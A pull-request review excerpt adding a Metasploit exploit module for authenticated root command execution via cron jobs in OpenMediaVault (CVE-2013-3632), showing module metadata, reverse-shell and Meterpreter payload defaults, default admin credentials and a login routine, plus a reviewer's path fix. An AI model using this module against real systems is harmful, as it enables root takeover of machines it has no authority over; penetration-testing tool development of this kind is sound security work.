modules/exploits/multi/http/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,279 @@
+        'Description' => %q{
+          OpenMediaVault allows an authenticated user to create cron jobs as root on the system.
+          An attacker can abuse this by sending a POST request via rpc.php to schedule and execute
+          a cron entry that runs arbitrary commands as root on the system.
+          All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # Original Discovery
+          'Mert BENADAM' # exploit author
+        ],
+        'References' => [
+          ['CVE', '2013-3632'],
+          ['PACKETSTORM', '178526'],
+          ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632']
+        ],
+        'DisclosureDate' => '2024-05-08',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl'],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'WfsDelay' => 65 # wait at least one minute for session to allow cron to execute the payload
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/']),
+        OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault'])
+      ]
+    )
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def rpc_success?(res)
+    res&.code == 200 && res.body.include?('"error":null')
+  end
+
+  def login(user, pass)
+    print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
```

Comment:
```suggestion
      'uri' => normalize_uri(target_uri.path, 'rpc.php'),
```

I think™ this should be enough

Reply:
See https://github.com/rapid7/metasploit-framework/pull/19298/commits/198f3f8d9bc37d04f89d9d190a39d2674f0a5384.